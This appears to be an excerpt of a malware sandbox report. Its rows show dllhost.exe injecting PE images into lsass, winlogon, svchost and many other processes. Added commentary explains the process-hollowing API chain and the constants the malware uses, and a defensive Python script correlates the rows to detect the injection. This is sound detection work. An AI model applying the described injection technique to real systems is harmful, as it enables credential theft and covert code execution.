Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2CA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 28721C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2BB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11D21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11721C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10A21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13E21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25B21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B821C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 28C21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2D021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2DC21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 23F21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E721C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB162A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE472A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE4A2A8C Jump to behavior
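The rows in this subsection carry more than the sandbox's per-row verdicts: the dllhost function at 5_2_0000000140002434 calls the classic process-hollowing chain (CreateProcessW, VirtualAllocEx, WriteProcessMemory, GetThreadContext, SetThreadContext, ResumeThread, followed by the Wow64GetThreadContext/Wow64SetThreadContext variant for 32-bit targets), and the "Thread created" rows above pair with the "Memory written" rows that follow: each remote thread starts a fixed offset past a base that dllhost just filled with a PE image (the 4D5A, "MZ", prefix). The RunPE constants above decode the same way: OpenProcess(128) is PROCESS_CREATE_PROCESS, the right to spoof a parent PID; NtAllocateVirtualMemory with 12288 and 64 is MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE; VirtualProtect with 64 makes a module's mapped bytes writable, which is what an unhooker needs. The script below is an added example written for this page, not part of the report or the sample: it parses rows copied from this section (a subset, labelled as such), checks the API chain as an ordered subsequence, counts distinct PE-written targets per source, flags credential- and session-holding targets, and recovers the injected image's entry offset by matching each thread's EIP (shown as the low 32 bits) against the nearest written base, which also attributes the "unknown" targets.

```python
"""Correlate sandbox behaviour rows into a cross-process injection verdict.

Row kinds handled (report format used on this page):
  "Code function"  -> ordered list of Win32 APIs called by one function
  "Thread created" -> remote thread start address (EIP, low 32 bits)
  "Memory written" -> remote write with target base and first bytes
"""
import re
from collections import defaultdict

# Sample rows copied from this section (a subset; not a live parse of the report).
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 5_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 3020000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
"""

API_RE = re.compile(r"^Source: (?P<src>.+?) Code function: \S+ (?P<apis>[A-Za-z0-9_,]+),")
THREAD_RE = re.compile(r"^Source: (?P<src>.+?) Thread created: (?P<dst>.+?) EIP: (?P<eip>[0-9A-Fa-f]+)")
WRITE_RE = re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)"
                      r" value starts with: (?P<magic>[0-9A-Fa-f]+)")

# Process hollowing: spawn, map the payload, redirect the primary thread, resume.
# Order matters, so the chain is checked as a subsequence of the call list.
HOLLOWING_CHAIN = ("CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
                   "GetThreadContext", "SetThreadContext", "ResumeThread")
WOW64_CHAIN = ("VirtualAllocEx", "WriteProcessMemory",
               "Wow64GetThreadContext", "Wow64SetThreadContext")

# Targets whose compromise yields credentials or the interactive logon session.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe"}
MAX_ENTRY_OFFSET = 0x100000  # an entry >1 MiB past a written base is not that image
MASS_INJECT_MIN = 3          # distinct PE-written targets from one source (assumed threshold)


def is_subsequence(needle, haystack):
    """True if every element of needle occurs in haystack, in order."""
    it = iter(haystack)
    return all(item in it for item in needle)


def parse_rows(text):
    chains, threads, writes = defaultdict(list), [], []
    for line in text.splitlines():
        line = line.strip()
        if m := API_RE.match(line):
            chains[m["src"]].extend(m["apis"].split(","))
        elif m := THREAD_RE.match(line):
            threads.append((m["src"], m["dst"], int(m["eip"], 16)))
        elif m := WRITE_RE.match(line):
            if m["magic"].upper().startswith("4D5A"):  # "MZ": a whole PE image was written
                writes.append((m["src"], m["dst"], int(m["base"], 16)))
    return chains, threads, writes


def match_entry(thread, writes):
    """Pair a remote thread with the PE write it most plausibly starts in.

    The report shows EIP as the low 32 bits of the start address, so the
    comparison is done modulo 2**32; the nearest preceding base wins. A
    target reported as "unknown" is resolved purely by address proximity.
    """
    src, dst, eip = thread
    best = None
    for wsrc, wdst, base in writes:
        if wsrc != src or (dst != "unknown" and wdst != dst):
            continue
        offset = (eip - base) & 0xFFFFFFFF
        if offset < MAX_ENTRY_OFFSET and (best is None or offset < best[2]):
            best = (wdst, base, offset)
    return best


def analyse(text):
    chains, threads, writes = parse_rows(text)
    targets = defaultdict(set)
    for src, dst, _ in writes:
        targets[src].add(dst)
    confirmed = []  # (injector, resolved target, base, entry offset)
    for thread in threads:
        if hit := match_entry(thread, writes):
            confirmed.append((thread[0], hit[0], hit[1], hit[2]))
    return {
        "hollowing_sources": sorted(s for s, a in chains.items() if is_subsequence(HOLLOWING_CHAIN, a)),
        "wow64_sources": sorted(s for s, a in chains.items() if is_subsequence(WOW64_CHAIN, a)),
        "mass_injectors": sorted(s for s, t in targets.items() if len(t) >= MASS_INJECT_MIN),
        "sensitive_hits": sorted({d for _, d, _ in writes if d.rsplit("\\", 1)[-1].lower() in SENSITIVE}),
        "entry_offsets": sorted({off for *_, off in confirmed}),
        "confirmed": confirmed,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

Run against the rows on this page, the entry offsets collapse to two values: 0x2A8C for every 64-bit target and 0x21C3 for the SysWOW64 and Program Files (x86) targets, which is the signature of one x64 and one x86 image being sprayed into every reachable process rather than per-target shellcode. That pairing, plus the same source writing MZ-prefixed memory into lsass.exe and winlogon.exe, is the check to carry into a hunt: a remote thread whose start address sits a constant small offset past a freshly written region in a protected process.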
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAE230000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 7DB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\MoUsoCoreWorker.exe base: 1C5C4260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23A94D50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF36C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 173E6B70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 166801F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 3020000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EB71E60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 227B9BA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 232E3380000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C06DDB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECA6970000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1010000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2AE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: A90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 24A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D90000 value starts with: 4D5A
